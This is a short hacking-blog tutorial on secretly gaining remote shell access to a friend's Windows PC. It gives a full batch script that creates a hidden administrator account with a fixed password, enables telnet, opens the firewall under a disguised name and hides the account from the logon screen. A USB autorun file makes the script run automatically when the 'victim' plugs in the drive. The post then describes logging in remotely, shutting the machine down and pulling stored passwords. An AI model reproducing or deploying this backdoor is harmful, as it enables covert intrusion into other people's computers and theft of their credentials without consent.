0
http://m14hackersworld.blogspot.com
How to access your friends Machine remotely !


If you have physical access to your friends machine then you can access his machine remotely using telnet server. All you have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.

These steps can be carried out simply and faster using a simple batch file (instal.bat). Here the source of batch file:
instal.bat

@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add

sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0

Now you can make this file to spread from one machine to another according to your own method like to spread this file as a autoplay program in pen drives. Here the code for autoplaying, just put these two files in pen drive and your work is done.
autorun.inf


[autorun]
open=instal.bat
When the victim plug this pen drive in his/her PC, instal.bat runs and it will do all the work for you then you can meet your friend online on yahoo msgr and use start>run>netstat -n 4 [press Enter] to find his/her IP address. After getting the IP address goto start>run>telnet ipaddress [press Enter], then press Y and then use these login detail to get login:
username: IE_USR
password: 123456

Now you have the shell prompt of friend machine. You can do anything. You can see what task are running there using tasklist command, you can shutdown its machine using shutdown -s and even get stored password from registry and do almost everthing from command prompt.

Post a Comment

M14 Network Inc. | Hassnain Arts

 
Top